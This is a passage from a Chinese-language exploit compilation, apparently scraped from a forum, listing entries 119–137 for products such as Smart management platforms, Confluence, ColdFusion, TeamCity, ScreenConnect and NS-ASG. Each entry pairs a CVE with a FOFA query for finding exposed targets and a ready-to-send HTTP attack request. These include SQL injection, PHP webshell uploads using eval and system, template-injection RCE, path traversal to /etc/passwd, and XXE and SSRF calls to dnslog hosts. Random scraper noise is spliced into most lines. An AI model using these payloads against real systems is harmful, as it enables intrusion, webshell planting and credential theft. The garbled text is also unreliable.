. d& d4 @$ `3 x9 o: K/home/src.php
5 k: R+ w; u2 W' g+ `-----------------------------13979701222747646634037182887--* ^1 W8 V# h; g& D, Z( B

3 c9 h8 x9 j% S0 C3 h  P+ j4 d- H. U0 I0 v: m
访问/home/src.php% ~' N% O# P9 G: Y) z% g  Q

0 S* C7 Q% M# ?& ]5 a119. 北京百绰智能S20后台sysmanageajax.php sql注入
6 V1 J3 c+ p7 F/ V8 fCVE-2024-1254
7 M1 ~4 S: g4 D# d) q& W3 dFOFA:title="Smart管理平台"
9 A3 ]* Y! F9 H先登录进入系统,默认账号密码为admin/admin2 H' h  b% S. e$ f7 w3 `
POST /sysmanage/sysmanageajax.php HTTP/1.119 @7 z3 @; T& g/ Q- o
Host: x.x.x.x  M9 K4 b1 f; w- ^8 s' U
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
1 J- R9 I# W. eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
1 Q2 q$ I; I6 V: X$ VAccept: */*
9 E* r3 v. k; E1 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- Z3 D, O) u4 t* bAccept-Encoding: gzip, deflate
9 Y4 ?; r0 \6 w+ JContent-Type: application/x-www-form-urlencoded;7 G% G8 b& ?$ B0 L; F$ H0 V* j2 y- |
Content-Length: 109! A+ u& G8 a- s; B
Origin: https://58.18.133.60:8443/ ?. z. p; S$ W' R" H6 [$ v& O; m! C
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
  l) p1 Z2 y, D, |5 JSec-Fetch-Dest: empty
  j9 H3 N  l+ i2 J# ASec-Fetch-Mode: cors2 z/ Y! y; N4 m. {2 |# U
Sec-Fetch-Site: same-origin
! _2 T. s  S) m' e2 V, B: qX-Forwarded-For: 1.1.1.1# w7 X2 }& g7 K2 l
X-Originating-Ip: 1.1.1.1
0 e) @& Q8 Y* x( Y% xX-Remote-Ip: 1.1.1.1& q9 x8 ~: c2 ~' k. \9 A- U* f$ C
X-Remote-Addr: 1.1.1.18 s, ^+ G  P2 q1 _7 T, |3 g% l6 b
Te: trailers
. k& s% P6 `5 PConnection: close
/ G3 i. H& S  X, r+ H
, \5 c: `, C: gsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234562 N) _9 ^; |; m5 S3 i7 \8 K' b

% Q. T' @( W5 c
# D% C; R  B+ f! \; D# P& r120. 北京百绰智能S40管理平台导入web.php任意文件上传3 t5 o8 U2 I$ `' N% V5 X3 P
CVE-2024-12533 U  W9 |3 H& }* B9 Y( I
FOFA:title="Smart管理平台"
4 k; P, a- C7 mPOST /useratte/web.php? HTTP/1.18 k! \& z" N) v
Host: ip:port
/ \8 W' ^6 k. kCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db2 s( f. p; ]# w: _* X8 j
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko0 W+ R8 J( o" w6 c8 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ p4 I  M5 v- a( `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 {  w4 c* I' N% l
Accept-Encoding: gzip, deflate; q$ [2 ]: M0 C# N
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328( `/ ?6 l( Y7 Y5 ~
Content-Length: 5978 @6 e) R# b1 ~5 k( _  u. y# s
Origin: https://ip:port
  S5 y8 w% u* j, k. }0 E2 UReferer: https://ip:port/sysmanage/licence.php+ I- x  l+ Z6 s6 E% m! |* b
Upgrade-Insecure-Requests: 1
4 L+ A2 B# ^; D! f: o  ]% zSec-Fetch-Dest: document6 L4 e4 W) A1 d* H& Z4 {5 J% I2 `5 m
Sec-Fetch-Mode: navigate9 {1 Y1 D6 i' ]- w
Sec-Fetch-Site: same-origin- l: Y2 i1 p8 |+ a
Sec-Fetch-User: ?1
0 ^8 g8 M) o0 G7 e% sTe: trailers
4 c4 U! \1 ~4 B; ?, i5 M" {% ?Connection: close
, P; @7 g8 q+ w# t0 o0 C% |; W' D+ \) Q- _2 y) q
-----------------------------423289041236658752706300793282 l5 ]5 F7 o! z& p0 P2 C
Content-Disposition: form-data; name="file_upload"; filename="2.php"# S& Y) w; w$ {7 E- Y0 X
Content-Type: application/octet-stream
8 a  D# s) N6 X9 r
* u' I- K4 ~( p2 d( P<?php phpinfo()?>/ G. E/ q6 x8 N! J1 f4 C
-----------------------------42328904123665875270630079328
/ f, C' L" q2 }: R( p: ZContent-Disposition: form-data; name="id_type"
5 L: a' r& K$ M3 q9 J/ r4 S" ?
1
. I* D* N3 K0 i6 m8 u  N; n) u-----------------------------42328904123665875270630079328
6 ~( X7 q5 X# m2 L# X2 l/ @Content-Disposition: form-data; name="1_ck"
  x, q) t( v. W/ {$ t8 x/ `# Z5 \& s
1_radhttp
" J, N! T" _2 z-----------------------------423289041236658752706300793281 ]: f4 a( W# N/ i6 `0 f
Content-Disposition: form-data; name="mode": e% {5 N3 P3 H: k* y. R

) Q7 R( W: O: @2 X% V7 f) Jimport5 Y$ L: L' ]  P. N3 a& r! Z5 t
-----------------------------42328904123665875270630079328
. L; y8 c( V) u) u- f7 ~( _: c2 \1 Y+ E# J  q4 u

/ N  s- Y' P/ t$ \文件路径/upload/2.php
( R. ^; a; T* f6 z
. {' L+ _: S  N) O121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ O& m! h3 _/ J9 e, N2 ]6 D; v4 L' MCVE-2024-1918
: i* V, s9 l) G/ cFOFA:title="Smart管理平台". x# [7 _5 z, ]% r+ t6 l: x% k
POST /useratte/userattestation.php HTTP/1.1; M1 v  E% [  r% P7 e8 d
Host: 192.168.40.130:8443
0 m# L) V( [$ R" ^Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
( u% k0 ~# G" {6 p! H( k: z9 E. p3 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko; D; w' J6 {. z; [6 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) D& Y# ~/ z4 Y" P. k7 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- U% O1 g( a/ u7 a3 t2 s
Accept-Encoding: gzip, deflate9 l; X) l/ x0 C
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
5 h7 W/ {/ q) O  t6 g% k/ zContent-Length: 592! o! r- i" k. P+ y) X2 Q
Origin: https://192.168.40.130:8443
, r6 `5 n: b" S$ @+ }! J$ zUpgrade-Insecure-Requests: 1
- ]; M/ O& t0 M' X5 E5 k4 ISec-Fetch-Dest: document, y3 X4 Q5 E+ v/ T
Sec-Fetch-Mode: navigate
: T- ?7 C. W3 M# ?5 K3 h' GSec-Fetch-Site: same-origin2 @4 `0 ?! J2 y  o* ~5 g5 t9 m
Sec-Fetch-User: ?17 e! Z" y" y: C3 B3 j
Te: trailers! d" S- ?2 U0 W. x; C
Connection: close
$ E8 Q& O* Z1 ?( E$ J' m/ v9 V3 p2 U" V% ^% ~8 }4 ]
-----------------------------42328904123665875270630079328
4 s% w% `1 }$ n5 g! tContent-Disposition: form-data; name="web_img"; filename="1.php". N( R) o. b& k: N2 H" l! C
Content-Type: application/octet-stream  U3 D, }, K' M. }8 e8 J

. o, o' [! M" k: a) I# ^8 o9 \<?php phpinfo();?>/ x& g( {# ~! ~5 Z& H. _
-----------------------------42328904123665875270630079328
( r1 _; I( ?- r/ @/ y; \" `1 _Content-Disposition: form-data; name="id_type"
- ]; a, i$ K) h- |0 _
' L2 D+ z  I- o19 B2 d9 @4 g7 t
-----------------------------42328904123665875270630079328( f+ W) A" f6 ]* @+ l7 J4 }
Content-Disposition: form-data; name="1_ck": G/ @" X8 \- Y& e; H" g7 Z

$ B. L- o3 I% G. Q- M1_radhttp
7 o6 s, g, }! S8 D) h& A-----------------------------42328904123665875270630079328
4 m$ D6 T1 I, P0 d: ^: ^Content-Disposition: form-data; name="hidwel"- X, g8 x. q; ^7 Q+ C3 R; ?

. S3 ?5 q8 k1 j3 M- n9 S7 Wset- @/ x: a  a" z8 S( h% y
-----------------------------42328904123665875270630079328
# T7 b/ I' W3 W/ C
' A; n/ V/ Q" f3 k) m; J) d# @+ @# I
4 ~$ D1 ?) }; x% p$ \# ~4 ?boot/web/upload/weblogo/1.php
+ E' L' ~4 T0 m% {1 ~2 i7 _3 m3 U+ }/ e, e1 D1 ?3 y
122. 北京百绰智能s200管理平台/importexport.php sql注入. E" k" A* p4 q6 o' |
CVE-2024-27718FOFA:title="Smart管理平台"1 o- e6 @, s, o: U$ l1 {' E
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()# D+ @7 j* g2 O- d& V
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1, U( c& q4 E5 Y5 y- z$ J4 E
Host: x.x.x.x' g/ Y# f0 a7 W/ b" I7 A( Y* H" j
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
; z9 `, `9 W' S3 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ {/ m/ y7 _9 y$ ~# u- ?: B& f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% h6 f4 C( `- t( [* c2 E0 UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' [( P6 ?0 _/ a0 L1 t. L* I; U
Accept-Encoding: gzip, deflate, br7 z4 M7 h! x% f4 G& o! J7 W
Upgrade-Insecure-Requests: 16 }# i7 j6 o7 B  z7 d( a6 g: f: ^
Sec-Fetch-Dest: document
% g1 i3 _" o( o) TSec-Fetch-Mode: navigate
. a3 u5 ^1 C' R4 h& s7 U3 m/ o' KSec-Fetch-Site: none& X& _- s* v. I' C" N$ v( |
Sec-Fetch-User: ?1
5 q! f0 P/ V6 N2 P1 G5 YTe: trailers
1 f) V1 q3 |: z2 l6 u& E$ ?Connection: close
! K& H% H# H$ n
- v# o, e; g; s3 b/ g) b* ^# `" t# B$ K2 y4 `6 }" n8 I6 ~( p
123. Atlassian Confluence 模板注入代码执行
! B1 d# C; k% ]: q. n0 OFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"; q! Q8 M5 T1 G6 e
POST /template/aui/text-inline.vm HTTP/1.1
, _0 F2 ?  V% P1 H6 xHost: localhost:80908 ?3 S, H( x' Q+ {
Accept-Encoding: gzip, deflate, br1 \) l- }( O9 p6 m" v! E
Accept: */*
" z' @/ X, n6 P, [0 `$ v& U! eAccept-Language: en-US;q=0.9,en;q=0.8. y+ R' W: P1 G+ P: b) l) R8 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36% D! e! Q0 N6 A% U8 h
Connection: close7 y; X; ?2 @* N# [% i; n( J. z
Content-Type: application/x-www-form-urlencoded5 U  }) C: M! x$ T) H; o

5 U8 j- L. ~! }' B* R1 Elabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
  }+ [8 g# P% b4 @# Z. I/ e2 x9 {& r) _& |" |

$ ~) F. V9 j% T" [124. 湖南建研工程质量检测系统任意文件上传
$ i$ r$ N. j1 bFOFA:body="/Content/Theme/Standard/webSite/login.css"
, o6 Z  t. o! P- W+ o8 V6 a) C3 _' fPOST /Scripts/admintool?type=updatefile HTTP/1.13 l( t3 E/ F0 y* ?* Z" h
Host: 192.168.40.130:8282
! X) R6 Y0 D% f; `User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.367 z; a# R) Z2 Z& }2 i! b2 _
Content-Length: 72
% s8 A0 w9 D0 K* x8 g$ g! \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8: f9 \. c" k( h- `# M1 s
Accept-Encoding: gzip, deflate, br
% l9 @/ _6 [0 F7 X7 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" ^0 W5 X9 X! w4 {' W0 @2 M& L+ d, M
Connection: close! f5 j. d. d9 I8 L  D
Content-Type: application/x-www-form-urlencoded
  ~. [" k( }, f' W
1 f' @4 O7 W) I9 e3 `7 N0 efilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
' K/ J0 d8 I2 P0 n& M+ O' M$ I" w- M: R- I- i" w% x- t1 |
5 [  F+ ]& h- l5 C
http://192.168.40.130:8282/Scripts/abcgcg.aspx
) L3 s0 v/ K8 k
, v, C% i0 s, F4 E" E125. ConnectWise ScreenConnect身份验证绕过
% j6 {. Z1 O5 B$ Y- [/ X/ Y, YCVE-2024-1709
2 K" K4 R  o. K- Z' Q7 I* RFOFA:icon_hash="-82958153"
* Q$ z. r8 F# P( k: yhttps://github.com/watchtowrlabs ... bypass-add-user-poc2 B, l, f" B7 z9 @" B$ g2 U! a

( k- G$ I: M3 W  k% x- K# U" C7 Q( F# Q' K4 N) X3 E
使用方法
4 w) N: ]( x4 \* p2 p* x* epython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
, I- d5 Y8 g" k
% g" d" E/ [' Z, B5 |7 H
2 o) a9 _: I6 [' A+ L9 Y- O创建好用户后直接登录后台,可以执行系统命令。% L8 s4 q$ k1 U
- G2 _- |  v) M) q$ }3 ?
126. Aiohttp 路径遍历# F- z' [9 `, ^& m
FOFA:title=="ComfyUI"
6 M$ Y- l/ R- _5 S8 x  DGET /static/../../../../../etc/passwd HTTP/1.1# j6 E& V8 v5 t
Host: x.x.x.x" B( k0 M9 d+ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- w! D6 p  A" J; J: N
Connection: close( C( |, v2 K0 u+ a& k$ B
Accept: */*) o3 K, j  d2 B2 g/ c
Accept-Language: en
# Y& z1 \! q) Y) t6 l7 `2 q' RAccept-Encoding: gzip
: d  E# ?' Z$ o( |- _) p! q
" L4 `7 V9 M8 U7 E* b3 S! R" d  w- K# p  a1 U- K" M
127. 广联达Linkworks DataExchange.ashx XXE. i/ o* Q8 c4 B. t( `% B3 R
FOFA:body="Services/Identification/login.ashx"
( w4 L! `  w$ n, |POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
: Z* x3 K3 A6 {* z' h- Z* ZHost: 192.168.40.130:8888- C# K& S3 ~2 h0 z% {* H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
7 s2 }1 W0 d2 z9 ?0 Q4 G2 j* EContent-Length: 415; g6 z. M, ]4 g  _4 h: p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 _+ f4 O1 e1 f
Accept-Encoding: gzip, deflate6 u# z; a! q. b9 }) N& [
Accept-Language: zh-CN,zh;q=0.9
, {* x  V5 Q0 m( {- d: X" c) lConnection: close# j% m- Z: l4 w4 S( A/ J6 v
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
6 p; |- m7 v6 \6 I/ p* ?, B  R6 zPurpose: prefetch$ G' C- q4 m) W8 G$ w* k
Sec-Purpose: prefetch;prerender
. u& i# W$ y2 E2 N% |2 j: q1 A. b' L
------WebKitFormBoundaryJGgV5l5ta05yAIe0  y! L9 x- P& M& p. K4 Z
Content-Disposition: form-data;name="SystemName"
% N' Y0 f+ S) N8 Z" a4 |, C3 i' a  a$ J6 n
BIM
2 x  B' J+ F7 ?3 d------WebKitFormBoundaryJGgV5l5ta05yAIe0. E. ]# t; G, F% j
Content-Disposition: form-data;name="Params"6 ]8 N2 x1 }( r- Y' v' T
Content-Type: text/plain
" z) D, h) A3 D- N5 I% E* \: l$ B6 c( J+ a0 F
<?xml version="1.0" encoding="UTF-8"?>* I% I% ?/ k# g) H; A/ X3 T% e0 \
<!DOCTYPE test [
8 \+ j# e5 }0 P7 T% n' o$ Y<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">, Q+ A3 V* x, Y7 g1 L
]( @: n/ u) c3 F+ g
>
) O. g$ @  W  `3 A" ~<test>&t;</test>7 c5 C0 D4 [0 l( ?3 O* u% m
------WebKitFormBoundaryJGgV5l5ta05yAIe0--: [9 A# s) M# }( U$ u8 B

4 x( N% M% j& d8 m
8 [. [% ~4 q8 ?' U, L6 A$ {4 |
/ o! M/ M% f1 @, [9 O128. Adobe ColdFusion 反序列化9 Z3 m/ x* H  y5 L/ y
CVE-2023-382034 z. H# n! b  h
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
6 y/ D6 ^+ q0 @$ a( s' U, WFOFA:app="Adobe-ColdFusion"
+ a! {6 [4 g/ W* ePAYLOAD0 u- _8 B6 \$ Y6 V7 w
, ~1 M  e' `6 Y; D& a1 h
129. Adobe ColdFusion 任意文件读取
7 C! J4 K1 d3 u. S! W; [CVE-2024-207672 E* s  q0 t: b% e" O; O' P( P
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"6 h  m: G$ C; }/ x
第一步,获取uuid
8 k4 @7 z. N0 c+ c) |% x0 a; X; iGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.14 \# [8 z# Z0 n& j3 \
Host: x.x.x.x9 y! Y0 R, }% b( M8 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ E; x* _/ @$ t" sAccept: */*
& g( i# r6 j- G0 S* s, zAccept-Encoding: gzip, deflate
, ?8 @" Z- D1 m. nConnection: close
$ L5 ^2 S. J( M- R5 ~1 u$ d
  C0 W6 F$ C+ D8 v6 x* c/ }7 T; H6 d* g
) m/ W. T1 w7 r, m第二步,读取/etc/passwd文件
$ |5 c" ]& E1 qGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
# ^1 H( e8 Q8 y! ]% l5 vHost: x.x.x.x
1 a5 P8 g/ t. B: h2 R; JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 V6 I$ g; A! X% J
Accept: */*
* j6 V% N$ F( f, {Accept-Encoding: gzip, deflate
# y9 h) C3 X; u) bConnection: close
. j  n) ]: H! Q, a& ?uuid: 85f60018-a654-4410-a783-f81cbd5000b9
2 F# \9 |6 ]( t( q6 |
% L, _8 v4 \8 d8 m
9 `2 T6 K, y+ r1 J  I1 z) K) i: d3 _130. Laykefu客服系统任意文件上传
, O9 |/ \! [+ K; s) yFOFA:icon_hash="-334624619"
( y& o; L8 L+ c$ a( QPOST /admin/users/upavatar.html HTTP/1.1
" R* u" Q8 x0 T& n2 D- cHost: 127.0.0.1
' H& }, n0 v" E& ~$ O# Y$ d* eAccept: application/json, text/javascript, */*; q=0.01
0 z0 W7 J; [- E9 oX-Requested-With: XMLHttpRequest
  D! u/ s: Y' l( h' E( r" yUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
" e) g8 A+ d- Z- U( O" oContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR2 y. o/ N3 z! e. E+ ^* v
Accept-Encoding: gzip, deflate
% Y9 M/ R# ~' K( XAccept-Language: zh-CN,zh;q=0.90 S' z' O5 R4 A) x, o
Cookie: user_name=1; user_id=3  k2 \( Y' T0 c) z" o
Connection: close/ t6 K0 t) m8 @
' k/ V$ |& x, _) H" D1 k
------WebKitFormBoundary3OCVBiwBVsNuB2kR8 h& i0 t- ?& y' e- c8 H, V
Content-Disposition: form-data; name="file"; filename="1.php"
) F, M5 R' c3 y# o$ D$ r+ qContent-Type: image/png
$ D0 l2 }/ D, F) l8 z
$ e7 O% X0 f# Y+ O+ L- b/ d* b<?php phpinfo();@eval($_POST['sec']);?># `' B3 ?" q* G+ u9 @
------WebKitFormBoundary3OCVBiwBVsNuB2kR--6 k/ [1 x  A' b+ q

3 ~0 Z; T5 V* O# S. b5 m0 @6 ]) e9 n4 c& g" T
131. Mini-Tmall <=20231017 SQL注入1 z2 W0 S' b% H- N% K% C
FOFA:icon_hash="-2087517259"
7 l+ ~" J9 y- R" Y1 r$ @. u后台地址:http://localhost:8080/tmall/admin6 I+ v( W( I( d/ M
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
. ?4 D8 K9 t# j( @$ F
7 n" y9 s0 K2 j$ S) z2 c# t8 X132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
  Q: |# N/ |4 ]CVE-2024-27198
+ i8 b" }8 p8 H4 n. h$ P  J! RFOFA:body="Log in to TeamCity"
8 D& j: ^0 U& C8 mPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
) U: u" U, b5 ?* I* o! I  H+ fHost: 192.168.40.130:8111% d* ]; l8 {; W( e" _) ~" g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& c6 r" b* F* L, I1 T1 K6 Q% x; LAccept: */*7 g. n7 g- |; y; [; [
Content-Type: application/json
' b* N8 ~" J& F: m0 c; l7 HAccept-Encoding: gzip, deflate
: ?; D  F$ u: R/ G. U7 C; d
3 `8 Z$ I9 J' S. M{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
" n& Z2 o& }$ ~3 |% j; C8 t) t+ z/ J6 N+ m6 U
4 K2 D" S& X9 L* C& r
CVE-2024-271996 @# B5 B' [& A1 ^& E8 v8 i
/res/../admin/diagnostic.jsp/ H/ T) E; f4 M  w: t% C6 S' u* B6 H
/.well-known/acme-challenge/../../admin/diagnostic.jsp; }6 N) R9 ?! e3 H. H/ N/ s
/update/../admin/diagnostic.jsp8 o- H  l+ ~0 Z2 }6 v$ A

% a7 o2 @& n' K
  y& n. d/ @9 ]+ \CVE-2024-27198-RCE.py8 p0 i" A9 `4 d

2 y1 Z5 M/ z0 }" C8 r3 r3 a133. H5 云商城 file.php 文件上传/ E# H, t9 z" J5 x9 E
FOFA:body="/public/qbsp.php"
( S1 U( E! m- QPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1/ D4 `7 [. M) t" M* ~/ L4 v/ r
Host: your-ip9 \0 A& |+ y/ ?. y( W. A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.362 t5 o; D* A* f$ k; ~( E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx& F. R9 Y$ h& d% Y, y5 i
; N7 f' L5 z* g0 |
------WebKitFormBoundaryFQqYtrIWb8iBxUCx) p2 m7 C0 U4 O+ Z, U6 C
Content-Disposition: form-data; name="file"; filename="rce.php"
9 ~4 z/ d0 E1 B6 h& h) R3 G2 lContent-Type: application/octet-stream
- P8 {9 }7 W$ f0 b' T3 {   U/ X# l- x2 C) U. e
<?php system("cat /etc/passwd");unlink(__FILE__);?>$ ^* B7 Y7 E! h. w  h; R
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--/ M7 Q8 [# R+ l- B3 \. p: x2 R
4 B/ N' V" [2 L; ?: ^, D6 n+ {
* _6 `) j3 v7 r- o
8 J$ a! {1 G) ]
134. 网康NS-ASG应用安全网关index.php sql注入+ y# R7 N$ {  g7 [1 K
CVE-2024-2330* v% d% p: E% a2 x; c
Netentsec NS-ASG Application Security Gateway 6.3版本
$ v2 X8 ~$ d! }6 D/ {/ ~FOFA:app="网康科技-NS-ASG安全网关"# t& N4 K, @, f% j! d, G" ]6 Y6 z
POST /protocol/index.php HTTP/1.1
4 I% Z- H4 C! e8 eHost: x.x.x.x4 s3 l+ E. v# }3 R7 K
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
; R0 a% R) u0 S, n7 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0# ^+ ], ^' K( p" x
Accept: */*3 w7 F- _6 M; t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& y# S/ ^9 J" W/ u9 X, ?( xAccept-Encoding: gzip, deflate
8 t* P$ \" M' w; W6 uSec-Fetch-Dest: empty
4 v5 w* u9 G8 J7 i. a+ uSec-Fetch-Mode: cors, x* o# B7 D5 K  R6 E5 b
Sec-Fetch-Site: same-origin: O  s# j% n' k% S# |1 k
Te: trailers. ?/ K4 W) ]# N5 [  I, F
Connection: close
& ]8 @9 c0 ]* \% ?Content-Type: application/x-www-form-urlencoded! L' R0 h) y4 o
Content-Length: 2630 y3 o( _, H9 ^7 U0 b

* s4 [, g  b& Z0 Ijsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}$ y% O6 j0 y) O. y' _9 U
# s+ \# Y! g) P. ~

3 v8 N2 B9 G) y$ a8 e135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
; A& `2 T0 A" V1 v& M, mCVE-2024-20229 E9 Q8 b1 s8 N4 W# b) _
Netentsec NS-ASG Application Security Gateway 6.3版本
1 \/ F$ b/ p" jFOFA:app="网康科技-NS-ASG安全网关"
( ?  e2 c2 r) vGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
! p" @  u: i2 Z, |6 Q. gHost: x.x.x.x% k3 ?! }1 E* N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ ~. N* q/ ]7 Y# g" k' i& i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. I' n- \4 A) J3 u# JAccept-Encoding: gzip, deflate
+ a  I) x" S7 Q% M2 t  YAccept-Language: zh-CN,zh;q=0.9
' f) l. f; g4 f3 |, U* y0 G$ m. S- IConnection: close
0 I+ q" p& W: V6 U
: m; H! Z4 @$ S; W/ q2 Z
3 h' m4 X. [1 ?. A136. NextChat cors SSRF
# }' E8 D8 ]% f  P& s9 yCVE-2023-49785
; m: I' Z3 R4 e$ I0 X6 C' iFOFA:title="NextChat"( N* ~& V/ |4 X6 w3 C+ I
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1# N, m4 n; b3 \1 t, V
Host: x.x.x.x:10000( Y  R- m( A9 ]+ z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; p/ s# j$ D1 I+ T& ^4 j
Connection: close
8 L6 l' e( R4 RAccept: */*
/ Y' ]8 u' F: {* y! u& AAccept-Language: en
9 Y7 y& U4 u/ `) G7 u/ |Accept-Encoding: gzip
) K% b7 t6 I& ^/ i/ N5 n; q" l' K/ L7 F& a/ \+ R( M; ]% K0 m' A

; E2 ^1 M; `; R" [' q* K$ w" p137. 福建科立迅通信指挥调度平台down_file.php sql注入1 Y7 z5 ^3 v) t% ^& x
CVE-2024-2620, T3 c( e/ b$ c9 O& _1 g
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
( i1 Y8 \* T. P0 }GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
0 }9 L2 W- W/ sHost: x.x.x.x
  d; F* q0 q' e. |/ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ b5 w/ Y4 T, L! L/ i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 f) \: v" I. g. y- ^2 w
